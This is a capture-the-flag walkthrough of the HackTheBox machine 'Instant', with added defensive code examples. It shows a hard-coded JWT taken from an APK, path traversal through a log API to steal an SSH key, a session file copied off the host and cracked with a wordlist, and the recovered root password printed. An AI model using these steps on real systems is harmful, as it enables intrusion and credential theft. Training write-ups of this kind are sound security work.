
# Instant

## Synopsis

**Instant** is a medium Linux machine created by [**tahaafarooq**](https://app.hackthebox.com/users/573430). The **instant.htb** domain hosts an ***apk*** file. Reversing the ***apk*** file reveals the **subdomains** and a **JWT** token that is used to read the logs. The read-logs functionality is abused to read the ***id\_rsa*** of the **shirohige** user. The ***/opt*** directory contains a password-protected, encrypted **Solar-PuTTY** ***.dat*** file that holds the session and credentials. **Decrypting** the file reveals the **root** password.

| OS    | Difficulty | Points | Release Date | Retired Date |
| ----- | ---------- | ------ | ------------ | ------------ |
| Linux | Medium     | 30     | 12-10-2024   | 01-03-2025   |

***

## Enumeration

### Nmap

The **`nmap`** scan found the SSH and HTTP services running.

```bash
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.37 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 09:30 EST
Warning: 10.10.11.37 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.37
Host is up (0.44s latency).
Not shown: 63941 closed tcp ports (conn-refused), 1592 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.45 seconds
```

Add **instant.htb** to the ***/etc/hosts*** file.

### Web - instant.htb

**Instant** is a **crypto** wallet. The website shows the Instant wallet features and lets us **download** ***instant.apk***.

<figure><img src="/files/MCqEyLlqFnxrVdlClS6a" alt=""><figcaption></figcaption></figure>

### File - instant.apk

Downloaded ***instant.apk*** and reversed it using **`jadx-gui`**. The **AdminActivities** class contains the **JWT** token and the **mywalletv1.instant.htb** subdomain.

<figure><img src="/files/1SPYsjZpVaDCAUs1bdEc" alt=""><figcaption></figcaption></figure>

Text searching for **.htb** gave another subdomain, **swagger-ui.instant.htb**.

<figure><img src="/files/Cf0lku4Folc79vKGQw0Z" alt=""><figcaption></figcaption></figure>

Add both the **mywalletv1** and **swagger-ui** subdomains to the ***/etc/hosts*** file.

{% hint style="info" %}
To text search, go to Navigation > Text Search.
{% endhint %}
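A hard-coded token like the one found in the APK can be caught before release by scanning the decompiled or source tree for JWT-shaped literals. The following is an added example, not part of the original write-up: the sample class body, the claim names (`id`, `role`) and the token itself are constructed, and signatures are not verified.

```python
import base64
import json
import re
import time

# A JWT is three base64url segments; header and payload both start with "eyJ" ('{"').
JWT_RE = re.compile(r"\beyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def decode_segment(segment):
    """Decode one base64url JWT segment to a dict, restoring stripped padding."""
    return json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))

def find_embedded_jwts(source_text, now=None):
    """Report every decodable JWT literal in source text (signature not checked)."""
    now = time.time() if now is None else now
    findings = []
    for match in JWT_RE.finditer(source_text):
        header_b64, payload_b64, _signature = match.group(0).split(".")
        try:
            header, claims = decode_segment(header_b64), decode_segment(payload_b64)
        except ValueError:
            continue  # JWT-shaped, but not valid base64url-encoded JSON
        exp = claims.get("exp")
        findings.append({
            "line": source_text.count("\n", 0, match.start()) + 1,
            "alg": header.get("alg"),
            "role": claims.get("role"),          # constructed claim name
            "no_expiry": exp is None,            # a token that never expires
            "expired": isinstance(exp, (int, float)) and exp < now,
        })
    return findings

def make_sample_token(claims):
    """Build a constructed token for the demo; the signature part is filler."""
    enc = lambda o: base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
    return ".".join([enc({"alg": "HS256", "typ": "JWT"}), enc(claims), "Y29uc3RydWN0ZWQ"])

# Constructed stand-in for a decompiled class; not the real AdminActivities source.
SAMPLE_SOURCE = (
    "public class AdminActivities {\n"
    '    String auth = "' + make_sample_token({"id": 1, "role": "Admin"}) + '";\n'
    "}\n"
)

if __name__ == "__main__":
    for finding in find_embedded_jwts(SAMPLE_SOURCE):
        print(finding)
```

A finding with `no_expiry` set and a privileged role is the case to fix first: the token has to be revoked server-side, since removing it from the next build does not invalidate copies already shipped.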

### Web - swagger-ui.instant.htb

**Swagger** (software) is a suite of tools for **API** developers. The project is open-source and licensed under the Apache License 2.0.

<figure><img src="/files/ufckiUAWuOXJFhZGwI1L" alt=""><figcaption><p>swagger-ui subdomain</p></figcaption></figure>

Clicking the <mark style="background-color:blue;">**Authorize**</mark> button opens a form for the Authorization **token**; entering the previously obtained **JWT** authorizes us.

<figure><img src="/files/B7QagFq2KVfkzw0mmlXn" alt=""><figcaption></figcaption></figure>

***

## Foothold

### Shell - shirohige \[ read logs ]

The **Logs** section contains the **API** to read and view the logs. It also shows the path to the logs, which is ***/home/shirohige/logs***.

<figure><img src="/files/S7bg7oJtxxd5Sb8mZa7i" alt=""><figcaption></figcaption></figure>

Clicking the <mark style="background-color:blue;">**Try it out**</mark> button and entering the default path to the *id\_rsa* file returns the ***id\_rsa***.

<figure><img src="/files/mPgZl4IwNeKNOmizs0WN" alt=""><figcaption></figcaption></figure>
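The log reader returns a file outside ***/home/shirohige/logs*** because the requested name is not confined to that directory. The following is an added example, not the machine's actual code: a hypothetical handler in its flawed form beside a hardened one, run against a constructed temporary directory with placeholder file contents.

```python
import os
import tempfile

def read_log_unsafe(log_dir, file_name):
    """Flawed pattern: the caller-supplied name is joined on unchecked."""
    with open(os.path.join(log_dir, file_name)) as fh:
        return fh.read()

def resolve_log_path(log_dir, file_name):
    """Return the real path of file_name only if it stays inside log_dir."""
    base = os.path.realpath(log_dir)
    # realpath collapses ".." and follows symlinks before the containment check;
    # an absolute file_name replaces base in the join and is caught the same way.
    candidate = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes the log directory")
    return candidate

def read_log_safe(log_dir, file_name):
    """Hardened reader: open only what resolve_log_path accepts."""
    with open(resolve_log_path(log_dir, file_name)) as fh:
        return fh.read()

def demo():
    """Compare both readers on a constructed home directory (all data is made up)."""
    with tempfile.TemporaryDirectory() as home:
        logs, key = os.path.join(home, "logs"), os.path.join(home, ".ssh", "id_rsa")
        os.makedirs(logs)
        os.makedirs(os.path.dirname(key))
        with open(os.path.join(logs, "1.log"), "w") as fh:
            fh.write("constructed log line\n")
        with open(key, "w") as fh:
            fh.write("CONSTRUCTED PLACEHOLDER, NOT A KEY\n")
        os.symlink(key, os.path.join(logs, "link.log"))
        requests = {"log": "1.log", "traversal": "../.ssh/id_rsa",
                    "absolute": key, "symlink": "link.log"}
        results = {"unsafe_traversal": read_log_unsafe(logs, requests["traversal"])}
        for label, name in requests.items():
            try:
                results[label] = read_log_safe(logs, name)
            except PermissionError:
                results[label] = "blocked"
        return results

if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:17} {outcome.strip()}")
```

Path confinement limits what the endpoint can return; running the API under an account that cannot read any user's `~/.ssh` limits the damage if the check is ever bypassed.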

Copy the **id\_rsa** into a file and clean up the extra spaces and words.

```bash
chmod 600 id_rsa
```

```bash
ssh -i id_rsa shirohige@10.10.11.37
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb 17 05:42:25 2025 from 10.10.16.25
shirohige@instant:~$
```

{% hint style="info" %}
The user.txt file contains the user flag :clap:
{% endhint %}

***

## Privilege Escalation

### Pillaging - shirohige

Checking **`sudo`** privilege requires command. The ***instant.db*** file is found and has some **hashes**, but they are uncrackable using **`hashcat`** and the ***rockyou.txt*** wordlist. The ***/opt/backups*** directory contains the ***Solar-PuTTY*** directory.

```bash
shirohige@instant:~$ cd /opt/backups
shirohige@instant:/opt/backups$ ls
Solar-PuTTY
```

Solar-PuTTY is a free SSH client developed by SolarWinds that allows you to connect to any server or device on your network.

The Solar-PuTTY directory contains the sessions-backup.dat file. Solar-PuTTY uses the .dat file to store sessions and credentials in encrypted form.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ ls
sessions-backup.dat
```

### Shell - root \[ .dat file decrypt ]

**VoidSec** has created a GitHub [**repository**](https://github.com/VoidSec/SolarPuttyDecrypt) to decrypt Solar-PuTTY ***.dat*** files using wordlists and save the result to a file.

The repository contains an ***.exe*** file that runs properly on a Windows machine, but I am using a Linux machine and **`wine32`** gives an error. **ItsWatchMakerr** has created a GitHub [**repository**](https://github.com/ItsWatchMakerr/SolarPuttyCracker) containing a **`python`** script to decrypt Solar-PuTTY ***.dat*** files, and I will be using this script.

{% stepper %}
{% step %}

#### Transferring sessions-backup.dat file to local machine

Start the **`python`** HTTP server on the remote machine and download the file using **`wget`** on the local machine.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.16.9 - - [18/Feb/2025 05:18:08] "GET /sessions-backup.dat HTTP/1.1" 200 -
```

```bash
wget http://10.10.11.37:8000/sessions-backup.dat
--2025-02-18 00:35:14--  http://10.10.11.37:8000/sessions-backup.dat
Connecting to 10.10.11.37:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100 (1.1K) [application/octet-stream]
Saving to: ‘sessions-backup.dat’

sessions-backup.dat                         100%[========================================================================================>]   1.07K  1.25KB/s    in 0.9s    

2025-02-18 00:35:16 (1.25 KB/s) - ‘sessions-backup.dat’ saved [1100/1100]
```

{% endstep %}

{% step %}

#### Git clone the above repository

```bash
git clone https://github.com/ItsWatchMakerr/SolarPuttyCracker.git
Cloning into 'SolarPuttyCracker'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 18 (delta 4), reused 10 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.97 KiB | 1.74 MiB/s, done.
Resolving deltas: 100% (4/4), done.
```

{% endstep %}

{% step %}

#### Create python virtual environment

To execute the script, create a **`python`** virtual environment and activate it.

```bash
python3 -m venv .venv 
source .venv/bin/activate 
```

{% endstep %}

{% step %}

#### Install the required module and execute the script

Change directory to ***SolarPuttyCracker*** and install the required modules.

```bash
cd SolarPuttyCracker 
pip3 install -r requirements.txt
```

Execute the script with the required arguments.

```bash
python3 SolarPuttyCracker.py -w /usr/share/wordlists/rockyou.txt -o ../session_restore.txt ../sessions-backup.dat
   ____       __             ___         __   __          _____                 __            
  / __/___   / /___ _ ____  / _ \ __ __ / /_ / /_ __ __  / ___/____ ___ _ ____ / /__ ___  ____
 _\ \ / _ \ / // _ `// __/ / ___// // // __// __// // / / /__ / __// _ `// __//  '_// -_)/ __/
/___/ \___//_/ \_,_//_/   /_/    \_,_/ \__/ \__/ \_, /  \___//_/   \_,_/ \__//_/\_\ \__//_/   
                                                /___/                                         
Trying to decrypt using passwords from wordlist...
Decryption successful using password: estrella
[+] DONE Decrypted file is saved in: ../session_restore.txt
```

{% endstep %}
{% endstepper %}

The ***session\_restore.txt*** file contains the root SSH password.

{% code title="session\_restore.txt" %}

```json
{
    "Sessions": [
        {
            "Id": "066894ee-635c-4578-86d0-d36d4838115b",
            "Ip": "10.10.11.37",
            "Port": 22,
            "ConnectionType": 1,
            "SessionName": "Instant",
            "Authentication": 0,
            "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
            "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
            "LastTimeOpen": "0001-01-01T00:00:00",
            "OpenCounter": 1,
            "SerialLine": null,
            "Speed": 0,
            "Color": "#FF176998",
            "TelnetConnectionWaitSeconds": 1,
            "LoggingEnabled": false,
            "RemoteDirectory": ""
        }
    ],
    "Credentials": [
        {
            "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
            "CredentialsName": "instant-root",
            "Username": "root",
            "Password": "12**24nzC!r0c%q12",
            "PrivateKeyPath": "",
            "Passphrase": "",
            "PrivateKeyContent": null
        }
    ],
    "AuthScript": [],
    "Groups": [],
    "Tunnels": [],
    "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
```

{% endcode %}
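When an export like this is exposed, the first response task is to work out which endpoints and accounts need their credentials rotated. The following is an added example, not part of the original write-up or of either decryption tool: it joins `Sessions` to `Credentials` using the field names visible in the file above, never prints secret values, and runs on constructed sample data.

```python
import json

# Credential fields that hold secret material in the export format shown above.
SECRET_FIELDS = ("Password", "Passphrase", "PrivateKeyContent")

def make_finding(cred, session_name, endpoint):
    """Describe one exposed credential by field name only, never by value."""
    return {
        "session": session_name,
        "endpoint": endpoint,
        "username": cred.get("Username"),
        "secrets": [field for field in SECRET_FIELDS if cred.get(field)],
    }

def audit_export(export_json):
    """List every stored credential and the endpoint it unlocks, if any."""
    data = json.loads(export_json)
    creds = {c["Id"]: c for c in data.get("Credentials") or []}
    used, findings = set(), []
    for session in data.get("Sessions") or []:
        cred = creds.get(session.get("CredentialsID"))
        if cred is None:
            continue  # no saved credential: only the endpoint is disclosed
        used.add(cred["Id"])
        endpoint = "%s:%s" % (session.get("Ip"), session.get("Port"))
        findings.append(make_finding(cred, session.get("SessionName"), endpoint))
    # Credentials no session points at are still in the file and still leaked.
    for cred_id, cred in creds.items():
        if cred_id not in used:
            findings.append(make_finding(cred, None, None))
    return findings

# Constructed sample in the same shape as the export; all values are made up.
SAMPLE_EXPORT = json.dumps({
    "Sessions": [
        {"Ip": "192.0.2.10", "Port": 22, "SessionName": "web01", "CredentialsID": "c-1"},
        {"Ip": "192.0.2.20", "Port": 22, "SessionName": "db01", "CredentialsID": "none"},
    ],
    "Credentials": [
        {"Id": "c-1", "Username": "root", "Password": "constructed",
         "Passphrase": "", "PrivateKeyContent": None},
        {"Id": "c-2", "Username": "deploy", "Password": "",
         "Passphrase": "constructed", "PrivateKeyContent": "constructed"},
    ],
})

if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        print(finding)
```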

We will use the **`su`** command to switch to **root** from the **shirohige** session, because **SSH** doesn't work with the above credentials.

```bash
shirohige@instant:/opt/backups/Solar-PuTTY$ su root
Password: 
root@instant:/opt/backups/Solar-PuTTY# whoami
root
root@instant:/opt/backups/Solar-PuTTY# 
```

{% hint style="info" %}
The root.txt file contains the root flag :tada:
{% endhint %}

***

## Proof of Concept

The video below provides the **PoC** for the Instant machine.

{% embed url="<https://odysee.com/instant:8a93f95d8b9cacfb42f2e0b29680222a59d04411>" %}

